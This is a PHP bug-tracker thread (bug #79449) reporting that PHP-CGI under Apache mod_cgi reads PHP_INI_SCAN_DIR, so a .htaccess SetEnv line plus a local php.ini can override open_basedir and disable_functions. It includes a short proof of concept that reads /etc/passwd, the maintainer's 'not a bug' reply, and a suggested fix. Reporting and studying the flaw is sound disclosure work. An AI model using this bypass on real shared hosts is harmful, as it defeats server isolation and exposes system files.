Bug #79449 [Nab]: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...)

From: Date: Sat, 04 Apr 2020 18:57:07 +0000
Subject: Bug #79449 [Nab]: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...)
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-226433@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=79449&edit=1 ID: 79449 User updated by: havijoori at protonmail dot com Reported by: havijoori at protonmail dot com Summary: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...) Status: Not a bug Type: Bug Package: *General Issues Operating System: Linux PHP Version: 7.4.4 Block user comment: N Private report: N New Comment: If you don't care about this issue, so I am going to publish it. Previous Comments: ------------------------------------------------------------------------ [2020-04-03 21:20:58] havijoori at protonmail dot com Yes, but some environment variables can be critical and should be protected. Same as the work you are doing in PHP-FPM. This can help servers like shared hosts which are serving PHP with mod_cgi. ------------------------------------------------------------------------ [2020-04-03 20:46:35] stas@php.net This is not a security issue, if you give your users control over the environment, they can influence the environment. ------------------------------------------------------------------------ [2020-04-03 20:42:19] havijoori at protonmail dot com Description: ------------ Description : ============= One of PHP features is running PHP scripts as CGI scripts with PHP-CGI. For example in Apache http server, we can refer php scripts to PHP-CGI with mod_cgi. In this state, PHP looks for PHP_INI_SCAN_DIR environment variable to find directory containing .ini files. So if we set this environment variable befoe calling php scripts, we can rewrite default php.ini configs such as open_basedir, disable_functions and other security configs. PoC : ===== First we configure a web server which handles PHP as CGI with mod_cgi. Apache config file is something like this : -------------------- LoadModule cgi_module modules/mod_cgi.so DocumentRoot "/srv/http" <Directory "/srv/http"> AllowOverride All Require all granted </Directory> Action php-script /cgi-bin/php AddHandler php-script .php ... -------------------- And we set some security restrictions in PHP config file : -------------------- [PHP] open_basedir = /srv/http:/tmp disable_functions = phpinfo ... -------------------- Now, we test our security config with a simple test.php file : -------------------- <?php echo file_get_contents('/etc/passwd'); ?> -------------------- <b>Warning</b>: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/srv/http:/tmp) in <b>/srv/http/test.php</b> on line <b>2</b><br /> And : -------------------- <?php echo phpinfo(); ?> -------------------- <b>Warning</b>: phpinfo() has been disabled for security reasons in <b>/srv/http/test.php</b> on line <b>2</b><br /> OK, now we make a .htaccess file in /srv/http and set PHP_INI_SCAN_DIR environment variable : -------------------- SetEnv PHP_INI_SCAN_DIR /srv/http -------------------- And a php.ini file in /srv/http : -------------------- [PHP] open_basedir = / disable_functions = -------------------- Here, both security restrictions are bypassed and we can read /etc/passwd file and run phpinfo function. Tested with PHP 7.4.4 and Apache 2.4.41. Prevention : ============ To prevent this vulnerability, you can put a config like "clear_env" in PHP-FPM for PHP-CGI or remove PHP_INI_SCAN_DIR from environment variables in CGI mode. ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=79449&edit=1

« previous php.bugs (#226433) next »